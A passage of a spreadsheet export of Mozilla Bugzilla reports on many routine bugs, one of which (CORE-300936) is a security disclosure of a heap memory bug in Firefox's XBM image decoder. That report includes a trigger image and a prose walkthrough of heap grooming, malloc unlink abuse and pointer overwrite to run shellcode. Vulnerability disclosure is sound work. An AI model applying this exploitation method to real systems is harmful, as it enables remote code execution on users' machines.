Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de-AT rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
German version: Access key check:
Menu Extras: hot key P is assigned twice for Passwort-Manager as well as for PopUp-Manager
Reproducible: Always
Steps to Reproduce:
1. Go to Extras
2. P underlines for Password-Manager and for PopUp-Manager too
Actual Results:  
Letter P in PopUp-Manager underlined
Expected Results:  
In older releases of Mozilla letter o was underlined</t>
  </si>
  <si>
    <t>kairo</t>
  </si>
  <si>
    <t>sven.sabrowski</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-580422</t>
  </si>
  <si>
    <t>Test Pilot</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD</t>
  </si>
  <si>
    <t>Test Pilot Raw Data log randomly resets</t>
  </si>
  <si>
    <t>I haven't been able to reproduce this on command and it seems to happen randomly.  Here's what happens:
I click 'more info' on the Firefox 4 Beta interface study I have running then click 'click here' to bring up my raw data log.  Everything is logging fine and I'll do some more UI interactions (click back etc) to test the study.  Everything seems to be logging fine but after a few minutes I'll click 'Click here' again to refresh the log and the log will be totally blank - no study meta data no events no anything.  I'll do some more UI interactions click 'Click here' again and the new UI interactions I have done are logged correctly but none of the old data is there so my log is only a few lines - its just like the log reset..
Tested against Mozilla/5.0 (Windows U Windows NT 6.1 WOW64 en-US rv:2.0b1) Gecko/20100630 Firefox/4.0b1</t>
  </si>
  <si>
    <t>jono</t>
  </si>
  <si>
    <t>cjung</t>
  </si>
  <si>
    <t>THUNDERBIRD-471336</t>
  </si>
  <si>
    <t>ctrl key activated drag and drop folders within folder pane has wrong icon</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b3pre) Gecko/20081225 Shredder/3.0b2pre  
see steps and results
Reproducible: Always
Steps to Reproduce:
1.in folderpane hold ctrl and drag and drop folder to another folder.
2.
3.
Actual Results:  
'+' icon for copy is shown
folder is moved
Expected Results:  
As in TB2
forbidden icon should show
nothing should happen.
I don't personally see the need for folder copy operations so I'd say the icon and action needs to be fixed.</t>
  </si>
  <si>
    <t>philbaseless-firefox</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-190586</t>
  </si>
  <si>
    <t>Release Notes (1.0 ~ 1.4) document profile location for win98/95 w/ log-in</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.0.2) Gecko/20021120 Netscape/7.01
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.0.2) Gecko/20021120 Netscape/7.01
It would appear that in page:
http://www.mozilla.org/releases/mozilla1.3a/
under section:
Profile Locations
the line:
Windows 95 &amp; Windows 98 C:\Windows\Application Data\Mozilla\Profiles\[Profile
Name]\[random string].slt\
should read:
Windows 95 &amp; Windows 98 C:\WINDOWS\Profiles\[User]\Application
Data\Mozilla\Profiles\[Profile Name]\[random string].slt\
Regards
Lowell Anderson
Reproducible: Always
Steps to Reproduce:
1. Read the page and compare to actual location :-)
2.
3.
Actual Results:  
See above
Expected Results:  
See above</t>
  </si>
  <si>
    <t>danielwang</t>
  </si>
  <si>
    <t>lowella</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-292897</t>
  </si>
  <si>
    <t>Request: SSH Access</t>
  </si>
  <si>
    <t>I'll be helping out with SFX now mainly working with CivicSpace/Drupal.  
The biggest issue now is upgrading an older CivicSpace to Drupal 4.6.
I'll need access to Shell/FTP to work on these componets.</t>
  </si>
  <si>
    <t>mozillamonks</t>
  </si>
  <si>
    <t>NSPR-480730</t>
  </si>
  <si>
    <t>NSPR</t>
  </si>
  <si>
    <t>PR_LoadLibrary for 64 bit MAC OS X ignores ./ and treats ./libname same as libname</t>
  </si>
  <si>
    <t>Created attachment 364695
test program
64-bit Mac OS X NSPR uses the dlopen functions (declared in ) for dynamic library loading see bug 370766
On most OS's PR_LoadLibrary treats ./  explicitly.
for Mac OS X:
   When path contains a slash (i.e. a full path or a partial path) dlopen() searches
     the following the following until it finds a compatible Mach-O file:
     $DYLD_LIBRARY_PATH (with leaf name from path ) current working directory (for par-
     tial paths) $DYLD_FALLBACK_LIBRARY_PATH (with leaf name from path ).
man dlopen
or
http://developer.apple.com/DOCUMENTATION/DeveloperTools/Reference/MachOReference/Reference/reference.html#//apple_ref/c/func/dlopen
meaning the Root Certs will be added provided ./libnssckbi.dylib is in the path not in the current directory
#0  pr_LoadLibraryByPathname (name=0x425450 ./libnssckbi.dylib flags=1) at ../../../../pr/src/linking/prlink.c:1028
....
#9  0x001c8407 in NSS_Initialize (configdir=0x25900 . certPrefix=0x17ff2  keyPrefix=0x17ff2  secmodName=0x1c556 secmod.db flags=0) at nssinit.c:653
#10 0x0000aa78 in certutil_main (argc=4 argv=0xbffff784 initialize=1) at certutil.c:2361
#11 0x0000c5d8 in main (argc=4 argv=0xbffff784) at certutil.c:2981</t>
  </si>
  <si>
    <t>glenbeasley</t>
  </si>
  <si>
    <t>FIREFOX-356789</t>
  </si>
  <si>
    <t>tinymce wysiwyg editor does not load</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 fr rv:1.8.1) Gecko/20061003 Firefox/2.0
Build Identifier: Mozilla/5.0 (MAC) Gecko/20061003 Firefox/2.0 RC2
TinyMCE WYSIWYG editor not does not render the content to be edited on initial
Reproducible: Always
Steps to Reproduce:
1.Go to the web page with Firefox RC 2.0 on Mac OS X 10.4.8
2.see the beautiful not editable textarea
3.
Actual Results:  
The editor does not load and not allow you to edit the content in the WYSIWYG
interface.
Expected Results:  
The editor should load and allow you to edit the content in the WYSIWYG
interface.</t>
  </si>
  <si>
    <t>capripot</t>
  </si>
  <si>
    <t>CORE-331291</t>
  </si>
  <si>
    <t>Push/Pop clip region in nsSVGImageFrame</t>
  </si>
  <si>
    <t>Regression from bug 330498 - clip region is persistent after drawing a  so nothing else draws.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-458930</t>
  </si>
  <si>
    <t>mobile builds need to clear out objdir/xulrunner/xulrunner/ at the start of each build</t>
  </si>
  <si>
    <t>Just saw this build log which is uploading a *ton* of xulrunner debs:
http://staging-master.build.mozilla.org:8010/builders/mobile-linux-arm-dep/builds/62/steps/shell_14/logs/stdio
http://staging-stage.build.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mobile-browser-linux-arm/</t>
  </si>
  <si>
    <t>CORE-163358</t>
  </si>
  <si>
    <t>Make install not working in widget/src/gtk2</t>
  </si>
  <si>
    <t>It tries to install the icon in /chrome/....</t>
  </si>
  <si>
    <t>CORE-148918</t>
  </si>
  <si>
    <t>nsILocalFile.idl clean up</t>
  </si>
  <si>
    <t>Move the public C function to nsXPCOM.h</t>
  </si>
  <si>
    <t>doug.turner</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-450659</t>
  </si>
  <si>
    <t>WebOps: Other</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD</t>
  </si>
  <si>
    <t>Need QMO update for SA-2008-047 - Drupal core - Multiple vulnerabilities</t>
  </si>
  <si>
    <t>Drupal security advisory SA-2008-047 (Drupal core - Multiple vulnerabilities) was released yesterday. Need to get QMO patched ASAP.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-592431</t>
  </si>
  <si>
    <t>Webdev</t>
  </si>
  <si>
    <t>Create snippet service for start page dynamic content</t>
  </si>
  <si>
    <t>Overview: Need to create a content server for the start page.
Project Scope: - input validation for incoming variables (GET)
- logic to retrieve data based on provided variables
- schema for storing content (go with key/val store for now)
- caching policies use of redis or memcache and aggressive http headers to work properly with proxy cache/load balancers/cdn
- panic button to turn all pages static for high load situations
Dependencies: 
	Legal: Any agreement with openx would have to be considered should we go that route.  Don't think there are any other concerns since the data is provided in public env vars.
	Security: Normal sec review.
	Finance: Any billing to openx should we go that route.
Assumptions: - that we'll work something out with openx as a content distribution service and take advantage of their reporting
Deliverables: Need to flesh this out.</t>
  </si>
  <si>
    <t>lorchard</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-331704</t>
  </si>
  <si>
    <t>Rename fantasai's cvs account add ssh key</t>
  </si>
  <si>
    <t>&gt; We are in the process of deleting cvs-www accounts that have do not
&gt; have a valid e-mail address.
fantasai%escape.com should become fantasai.cvs%inkedblade.net
&gt; We do not have an ssh key for your account on cvs-www.
Will attach.</t>
  </si>
  <si>
    <t>aravind</t>
  </si>
  <si>
    <t>fantasai.bugs</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-486362</t>
  </si>
  <si>
    <t>IE8 testing for spreadfirefox.com</t>
  </si>
  <si>
    <t>This is a tracking bug for IE8 testing of spreadfirefox.com. No bugs are to be filed as comments in this bug.
Testing to begin asap.
We should verify bugs found are not also present in IE7 and that they were not marked as WONTFIX.</t>
  </si>
  <si>
    <t>mozwebqa</t>
  </si>
  <si>
    <t>ryan.doherty</t>
  </si>
  <si>
    <t>CORE-300936</t>
  </si>
  <si>
    <t>ImageLib</t>
  </si>
  <si>
    <t>ABR in XBM image leading to arbitrary code execution</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050712 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050712 Firefox/1.0.4
mozilla/modules/libpr0n/decoders/xbm/nsXBMDecoder.cpp:
***
nsresult nsXBMDecoder::ProcessData(const char* aData PRUint32 aCount)
{
[...]
        // Check for X11 flavor
        if (strstr(mPos  char ))
            mIsX10 = PR_FALSE
        // Check for X10 flavor
        else if (strstr(mPos  short ))
            mIsX10 = PR_TRUE
        else
            // Neither identifier found.  Return for now waiting for more data.
            return NS_OK 
[...]
    if (mState == RECV_DATA)
    {
        PRUint32 bpr
        mFrame-&gt;GetImageBytesPerRow(
        PRUint32 abpr
        mFrame-&gt;GetAlphaBytesPerRow(
        PRBool hiByte = PR_TRUE
        do
        {
            PRUint32 pixel = strtoul(mPos 
[...]
[1]         while (*endPtr &amp;&amp; isspace(*endPtr))
                endPtr++       // skip whitespace looking for comma
            if (*endPtr &amp;&amp; (*endPtr != ''))
            {
[5]             *endPtr = '\0'
                mState = RECV_DONE  // strange character (or ending '}')
            }
                (...)
            if (!mIsX10 || !hiByte)
[2]             mPos = endPtr // go to next value only when done with this one
        [...]
[3]         mPos++
[4]     } while (*mPos 
***
The ProcessData function of the nsXBMDecoder class parse the data of an XBM's
format image.
The bug happens during the re-processing of this image format within the
libpr0n a module activated by default :
At [1] endPtr is incremented until the null terminating character if it's
fill by ' ' space.
At [2] mPos is set to endPtr if mIsX10 and hiByte are null. There are option
taken from the XBM format's image.
At [3] mPos is incremented without checking if *mPos is null.
Thus the boucle at [4] can not stop depending on the state of the heap.
I found it is possible to craft such an XBM image to put the heap layout in
a predictable state and exploit the bug reliably.
An attacker could execute arbitrary code on mozilla firefox if a web page is
viewed or even within an e-mail with a IFRAME tag.
Reproducible: Always
Steps to Reproduce:
#0  nsXBMDecoder::ProcessData (this=0x870b2e0 
    aData=0x81c3e44 #define gopher_binary_width 20\n#define
gopher_binary_height 23\nstatic char gopher_binary_bits[] = {\n   0x00 0x00
0x00 0x00
 0x00 0x00 0x00 0
x00 0x00 0x00 0x00 0x00\n   0xff 0x3f 0x00 0x01... aCount=254) at
nsXBMDecoder.cpp:142
#1  0x41fc11d9 in nsXBMDecoder::ReadSegCb (aIn=0x8680e2c aClosure=0x870b2e0 
    aFromRawSegment=0x81c3e44 #define gopher_binary_width 20\n#define
gopher_binary_height 23\nstatic char gopher_binary_bits[] = {\n   0x00 0x00 
0x00 0x00 0x00 0x0
0 0x00 0x00 0x00 0x00 0x00 0x00\n   0xff 0x3f 0x00 0x01...
aToOffset=0 aCount=254 aWriteCount=0xbfffe844) at nsXBMDecoder.cpp:129
#2  0x401942a2 in nsPipeInputStream::ReadSegments (this=0x8680e2c 
    writer=0x41fc11a0 &lt;nsXBMDecoder::ReadSegCb(nsIInputStream* void* char
const* unsigned int unsigned int unsigned int*)&gt; closure=0x870b2e0 c
ount=254 
    readCount=0xbfffe8c8) at nsPipe3.cpp:761
#3  0x41fc1223 in nsXBMDecoder::WriteFrom (this=0x870b2e0 aInStr=0x8680e2c
aCount=254 aRetval=0xbfffe8c8) at nsXBMDecoder.cpp:134
#4  0x41fadc8f in imgRequest::OnDataAvailable (this=0x87e60d8
aRequest=0x8798458 ctxt=0x0 inStr=0x8680e2c sourceOffset=0 count=254) at
imgReques
t.cpp:796
#5  0x41fa5f50 in ProxyListener::OnDataAvailable (this=0x8285b98
aRequest=0x8798458 ctxt=0x0 inStr=0x8680e2c sourceOffset=0 count=254) at imgLoa
der.cpp:862
#6  0x41ca0b8b in nsMediaDocumentStreamListener::OnDataAvailable
(this=0x871a678 request=0x8798458 ctxt=0x0 inStr=0x8680e2c sourceOffset=0 count
=254)
    at nsMediaDocument.cpp:114
#7  0x415e7688 in nsDocumentOpenInfo::OnDataAvailable (this=0x873e740
request=0x8798458 aCtxt=0x0 inStr=0x8680e2c sourceOffset=0 count=254) at n
sURILoader.cpp:344
#8  0x40bb6933 in nsFileChannel::OnDataAvailable (this=0x8798458 req=0x8748a20
ctx=0x0 stream=0x8680e2c offset=0 count=254) at nsFileChannel.cpp
:594
#9  0x40b2d258 in nsInputStreamPump::OnStateTransfer (this=0x8748a20) at
nsInputStreamPump.cpp:433
#10 0x40b2ce88 in nsInputStreamPump::OnInputStreamReady (this=0x8748a20
stream=0x8680e2c) at nsInputStreamPump.cpp:336
#11 0x401983f7 in nsInputStreamReadyEvent::EventHandler (plevent=0x86cadf4) at
nsStreamUtils.cpp:118
#12 0x401bbf9b in PL_HandleEvent (self=0x86cadf4) at plevent.c:673
#13 0x401bbe50 in PL_ProcessPendingEvents (self=0x80d0fd0) at plevent.c:608
#14 0x401bf14a in nsEventQueueImpl::ProcessPendingEvents (this=0x80d0ad8) at
nsEventQueue.cpp:398
#15 0x409591d0 in event_processor_callback (data=0x80d0ad8 source=4
condition=GDK_INPUT_READ) at nsAppShell.cpp:186
#16 0x40958b7d in our_gdk_io_invoke (source=0x8211540 condition=G_IO_IN
data=0x8210f50) at nsAppShell.cpp:71
#17 0x404284c6 in g_io_add_watch () from /usr/lib/libglib-1.2.so.0
#18 0x40429dd8 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#19 0x4042a2c1 in g_get_current_time () from /usr/lib/libglib-1.2.so.0
#20 0x4042a5e5 in g_main_run () from /usr/lib/libglib-1.2.so.0
#21 0x4033525f in gtk_main () from /usr/lib/libgtk-1.2.so.0
#22 0x4095961a in nsAppShell::Run (this=0x80d6c48) at nsAppShell.cpp:317
#23 0x408cf8ea in nsAppShellService::Run (this=0x80d56e0) at
nsAppShellService.cpp:494
#24 0x0805e5cd in xre_main (argc=1 argv=0xbffff484 aAppData=0x807500c) at
nsAppRunner.cpp:1907
#25 0x0805851c in main (argc=1 argv=0xbffff484) at nsBrowserApp.cpp:58
------------------
#define gopher_binary_width 20
#define gopher_binary_height 23
static char gopher_binary_bits[] = {
   0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
   0xff 0x3f 0x00 0x01 0x60 0x00 0x01 0xa0 0x00 0x71 0x26 0x01      EOF
As you can see the image end with a space character when the program assume
the image to be clean and contain end tag.
Thus if one is able to control the heap layout it is possible to execute
arbitrary code.
Here is some details on how to exploit the bug on Linux :
- Use a javascript and allocate a lot of 'local' buffer. I found JC_GC is called
at the end of the javascript parsing before any image are loaded and will free
all 'useless' (because local) buffer.
Thus it is easy to 1) Allocate in some global array a lot of *little bufer* to
begin so we have the heap layout in a predictable state (no hole).
2) Allocate a few big buffer with isdigit()-valid character. Because there is no
more heap hole the 'top chunk' of the heap is expended.
3) When JC_GC return some memory have been freed and thus following
allocation will fall in these new heap hole.
4) When the image is processed the overflowed buffer will be followed by
isdigit-character (this is junk in the prev_size field of the next struct
malloc_chunk). Then a '\0' will be written on the LSB of the 'next size' field
of the next struct malloc_chunk on the heap.
Because it is easily possible to inject controlled character on the heap
(actually that could have been done in the few isdigit()-valid buffer) it is
possible to store fake information on the heap and tricks malloc()/free()/etc
to parse them.
Still in the scheme of Doug Lea malloc (linux) this will end by triggering the
macro UNLINK() which basically insert a heap chunk in a linked list thus
writing a controlled pointer of us to a controlled address of us.
One can simply overwrite any function pointer like GOT entry saved %eip
pointer on the stack and hijack it to point to some injected shellcode.
Exploitation is possible on *BSD / Windows aswell.
Actual Results:  
Ability to execute whatever code you want.
Expected Results:  
Stop me.</t>
  </si>
  <si>
    <t>jackerror823</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-434508</t>
  </si>
  <si>
    <t>Tracking bug for Build and Release of FF3.0 RC2</t>
  </si>
  <si>
    <t>Place holder until drivers make a go/no-go decision.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-460843</t>
  </si>
  <si>
    <t>tracemonkey unittest machine burning (moz2-win32-slave14)</t>
  </si>
  <si>
    <t>http://tinderbox.mozilla.org/showbuilds.cgi?tree=TraceMonkey
It is stuck removing a file and called WINNT 5.2 mozilla-central moz2-win32-slave14 dep unit test but I think that is a misnomer.</t>
  </si>
  <si>
    <t>sayrer</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-799473</t>
  </si>
  <si>
    <t>please update AUS to AUS2_PRODUCTION tag</t>
  </si>
  <si>
    <t>You should end up with rev 1.228 of config-dist.php.</t>
  </si>
  <si>
    <t>pradcliffe+bugzilla</t>
  </si>
  <si>
    <t>kmoir</t>
  </si>
  <si>
    <t>CORE-194330</t>
  </si>
  <si>
    <t>crash on trying to print or print preview the above url</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win95 en-US rv:1.2.1) Gecko/20021130
Build Identifier: Mozilla/5.0 (Windows U Win95 en-US rv:1.2.1) Gecko/20021130
The above url causes mozilla to freeze and need an alt-ctl-del and end task to
get back from it when you try to print or print preview it (freezes on preparing).
Reproducible: Always
Steps to Reproduce:
1. Open Browser
2. Go to http://ato.gov.au/content/notforprofit/29723.htm
3. Try to Print or Print Preview
Actual Results:  
mozilla freezes
Expected Results:  
Printed or Previewed the print job
I've also seen this in 1.2.1 running on Win98</t>
  </si>
  <si>
    <t>noel.clarkson</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-327131</t>
  </si>
  <si>
    <t>Size/position in bind handling</t>
  </si>
  <si>
    <t>Context size and position is passed to the XPath evalutator the wrong way around in the processing of binds.</t>
  </si>
  <si>
    <t>SEAMONKEY-208903</t>
  </si>
  <si>
    <t>Download &amp; File Handling</t>
  </si>
  <si>
    <t>download manager doesn't work with non-ASCII file names.</t>
  </si>
  <si>
    <t>The patch for bug 175881 introudced this problem. (attachment 124826).
The patch has the following line 
-    gStatusBar.label = getSelectedItem().id
+    gStatusBar.label = getFileForItem(getSelectedItem()).path
The noticable change introduced by this is that the status bar shows 'garbage'
characters for non-ASCII file names. Going back to 
|getSelectedItem().id| (chopping off 'file://' at the beginning if necessary)
will solve this 'UI' regression. However that's not touching the root cause of
the problem because none of command buttons is functional (all of them is dimmed
out) when a non-ASCII file is  selected  with or without the change. The file
operation in other parts of Mozilla work fine so that nsIFile and nsILocalFile
are not to blame. [1]
getFileForItem() is defined in 
http://lxr.mozilla.org/seamonkey/source/xpfe/components/download-manager/resources/downloadmanager.js#357
as
357 function getFileForItem(aElement)
358 {
359   var itemResource = gRDFService.GetUnicodeResource(aElement.id)
360   var fileResource = gDownloadView.database.GetTarget(itemResource
gNC_File true)
361   fileResource =
fileResource.QueryInterface(Components.interfaces.nsIRDFResource)
362   return createLocalFile(fileResource.Value)
363 }
364 
365 function createLocalFile(aFilePath) 
366 {
I added a couple of 'dump()' statements in createLocalFile(aFilePath) and
printed out |aFilePath).  aFilePath is zero-extended UTF-8. For instance 
U+00A0 (in UTF-8 it's 0xC2 0x80) aFilePath should have 'U+00A0'. Instead it
has 'U+00C2 U+0080'. This symptom suggests that somewhere in RDF-related code
ACString is used where AUTF8String should have been used. 
[1] Recently I've been working on enabling 'Unicode' file I/O in Windows (bug
162361) and with that enabled Mozilla-Windows has the same problem as Linux
under UTF-8 locale. Therefore I think this is an XP issue althouhg I'm filing
this under Linux for now.</t>
  </si>
  <si>
    <t>CORE-336214</t>
  </si>
  <si>
    <t>Widget: Gtk</t>
  </si>
  <si>
    <t>Can't move (drag and drop) multiple bookmarks from one folder to another</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060501 Minefield/3.0a1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9a1) Gecko/20060501 Minefield/3.0a1
When two or more bookmarks are selected in Places and then dragged to a folder nothing happens.  When I select only one of the bookarms and try to move it it moves successfully.
Reproducible: Always
Steps to Reproduce:
1. Select multiple bookmarks
2. Drag to a folder
3. 
Actual Results:  
Nothing happens
Expected Results:  
All bookmarks should be moved to the folder</t>
  </si>
  <si>
    <t>mwu.code</t>
  </si>
  <si>
    <t>franklin</t>
  </si>
  <si>
    <t>BUGZILLA-110276</t>
  </si>
  <si>
    <t>SQL error in globals.pl</t>
  </si>
  <si>
    <t>If you click on Show dependency graph for any bug check Show the summary of
all bugs on the new page and click Submit again you get:
Software error:
select bug_status short_desc from bugs LEFT JOIN cc selectVisible_cc ON
bugs.bug_id = selectVisible_cc.bug_id AND selectVisible_cc.who = 29933 WHERE
((bugs.groupset &amp; 0) = bugs.groupset OR (bugs.reporter_accessible = 1 AND
bugs.reporter = 29933) OR (bugs.assignee_accessible = 1 AND bugs.assigned_to =
29933) OR (bugs.qacontact_accessible = 1 AND bugs.qa_contact = 29933) OR
(bugs.cclist_accessible = 1 AND selectVisible_cc.who = 29933 AND not
isnull(selectVisible_cc.who))) AND bug_id = 102293: Column: 'bug_id' in where
clause is ambiguous at globals.pl line 222.</t>
  </si>
  <si>
    <t>bugzilla3</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-819317</t>
  </si>
  <si>
    <t>Pages &amp; Content</t>
  </si>
  <si>
    <t>Have mozilla.org/gameon/ redirect to gameon.mozilla.org once it's live</t>
  </si>
  <si>
    <t>We want to redirect all traffic to the site and to ensure we don't have anyone left visiting the out of date page that we did promote rather a lot in the past we're going to redirect from the old to new :)
This is obviously blocked by gameon.mozilla.org not being live yet - but hopefully it will be Monday (10th December 2012)/Tuesday (11th December 2012) next week.</t>
  </si>
  <si>
    <t>rossbruniges</t>
  </si>
  <si>
    <t>CORE-462802</t>
  </si>
  <si>
    <t>Highly suspect origin code in nsCrossSiteListenerProxy.cpp</t>
  </si>
  <si>
    <t>It looks like this code was added in bug 389508.
The two issues from my point of view:
1) It doesn't use the innermost URI from the principal.  Should it?
2) It never sends null as the Origin instead it kills off the load if the
   origin is something without a host.  This doesn't seem to be the code's
   intent.
It seems to me that we should factor out the principal -&gt; origin conversion out somewhere and make it correct there are various abortive attempts at this code in the origin header on POST bug as well...
Requesting blocking since it looks to me like we tried to align ourselves with the access-control spec here and sorta failed.</t>
  </si>
  <si>
    <t>SEAMONKEY-258600</t>
  </si>
  <si>
    <t>RFE: line-through deleted IMAP messages (PATCH)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.1) Gecko/20040802 Debian/1.7.1-5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.1) Gecko/20040802 Debian/1.7.1-5
Hello
From the easy-UI-improvements dept here are patches to standard Mozilla themes
that make MailNews list deleted IMAP messages as struck through (as nicely does
outlook express by the way).
Experience proved that it is easy to miss the tiny red square on the small icon
and the struck through style looks dirty enough to invite the users to expunge
their mailboxes. Upcoming RFE an expunge button in the toolbar.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>NSS-333600</t>
  </si>
  <si>
    <t>ssltap should format and display TLS hello extensions and alerts</t>
  </si>
  <si>
    <t>Several TLS hello extensions are being added to NSS for NSS 3.11.1
ssltap should be able to display them properly.
P2</t>
  </si>
  <si>
    <t>nelson</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-308927</t>
  </si>
  <si>
    <t>Send .ics files as text/calendar (Cannot subscribe to holidays calendars)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050911 Firefox/1.0.6 (Debian package 1.0.6-5)
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.10) Gecko/20050911 Firefox/1.0.6 (Debian package 1.0.6-5)
From the holidays calendar instruction:
=====
We've got some calendar holiday files available for download. To add these to
your calendar install the Calendar and click on the links below. You will be
prompted to subscribe to them. That way you don't have to continually download them.
=====
Clicking on the links doesn't work nor in Calendar/Firefox-1.0.6 neither in
Calendar/Mozilla-1.7.11 (both as Debian packages) because the link are in the
http:// form not in the webcal:// form. If I manually open the link as
webcal://[link] I can subscribe.
Reproducible: Always
Steps to Reproduce:
1. Install the calendar extension
2. Open http://www.mozilla.org/projects/calendar/caldata/EnglishHolidays.ics
Actual Results:  
The calendar is open as a plain text page in the browser.
Expected Results:  
The calendar extension should ask to subscribe to the calendar.
I tested only on GNU/Linux but I'm 100% sure that the problem is present in all
platforms/OSes.</t>
  </si>
  <si>
    <t>CORE-94933</t>
  </si>
  <si>
    <t>background image not found: background opaque not transparent</t>
  </si>
  <si>
    <t>Overview Description: 
  Broken out from bug 91034:
  If a table background image does not exist (e.g. 404 Not Found) 
  on win32 the table be transparent while on Mac and Linux it 
  will be solid white and will not show layers below.
Steps to Reproduce: 
1) load the attachment: yellow or white table?
Actual Results:  win32: yellow mac/linux: white
Expected Results: I think win32 is correct and is consistent 
                  with Nav4.x
Starting with imagelib but this may be at a lower level (e.g. GFX).</t>
  </si>
  <si>
    <t>pavlov</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-240531</t>
  </si>
  <si>
    <t>I receive a The page cannot be displayed message when trying to veiw the above address.  Works OK in I.E.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040316
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040316
The page cannot be displayed
There is a problem with the page you are trying to reach and it cannot be displayed.
Please try the following:
    * Click the Refresh button or try again later.
    * Open the www.thayer.org home page and then look for links to the
information you want.
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services
Technical Information (for support personnel)
    * Error Type:
      Microsoft VBScript runtime (0x800A000D)
      Type mismatch: '[string: 1.7b]'
      /arts_athletics/athletics/team.asp line 184
    * Browser Type:
      Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040316
    * Page:
      GET /arts_athletics/athletics/team.asp
    * Time:
      Wednesday April 14 2004 2:38:21 PM
    * More information:
Reproducible: Always
Steps to Reproduce:
1.Go to Thayer.org homepage
2.Mouse over arts/athletics and the click on athletics
3.Click on teams and schedules
4.I copied and pasted the web page displayed in the actual results field below.
Actual Results:  
The page cannot be displayed
There is a problem with the page you are trying to reach and it cannot be displayed.
Please try the following:
    * Click the Refresh button or try again later.
    * Open the www.thayer.org home page and then look for links to the
information you want.
HTTP 500.100 - Internal Server Error - ASP error
Internet Information Services
Technical Information (for support personnel)
    * Error Type:
      Microsoft VBScript runtime (0x800A000D)
      Type mismatch: '[string: 1.7b]'
      /arts_athletics/athletics/team.asp line 184
    * Browser Type:
      Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7b) Gecko/20040316
    * Page:
      GET /arts_athletics/athletics/team.asp
    * Time:
      Wednesday April 14 2004 2:38:21 PM
    * More information:Page cannot be displayed appears
Expected Results:  
The page that should open has a pulldown list of all the available teams and
their schedules.  This works OK in I.E.</t>
  </si>
  <si>
    <t>aviation</t>
  </si>
  <si>
    <t>COMMUNITY_BUILDING-538271</t>
  </si>
  <si>
    <t>cs / Czech</t>
  </si>
  <si>
    <t>COMMUNITY_BUILDING</t>
  </si>
  <si>
    <t>Publikovat RSS pres FeedBurner</t>
  </si>
  <si>
    <t>ProÄ a jak na to viz http://www.google.com/support/feedburner/</t>
  </si>
  <si>
    <t>pcvrcek</t>
  </si>
  <si>
    <t>p.franc</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-337571</t>
  </si>
  <si>
    <t>Fix the inability to edit keywords on folders in the outline view</t>
  </si>
  <si>
    <t>We don't allow folders to have keywords so the keyword field in the Folder view of the info panel should be disabled.
Right now it's not in the tab loop but you can still click there add a keyword and watch it be discarded when you leave the field :P
We should disable the field entirely (and maybe make the label grey?) until such time as we actually support keywords for folders/tab groups if ever (I thought there was a bug but I can't find it).
Blocking bug 325880 because this *is* just a .nib change :)</t>
  </si>
  <si>
    <t>bugzilla-graveyard</t>
  </si>
  <si>
    <t>MOZILLA_LABS-388345</t>
  </si>
  <si>
    <t>Joey</t>
  </si>
  <si>
    <t>MOZILLA_LABS</t>
  </si>
  <si>
    <t>Joey Server - When using type= filter pagination has to work accordingly</t>
  </si>
  <si>
    <t>Currently if we set type=images ( for example ) we get a few images but the pagination information relates to the full list.</t>
  </si>
  <si>
    <t>mgalli</t>
  </si>
  <si>
    <t>BUGZILLA-298306</t>
  </si>
  <si>
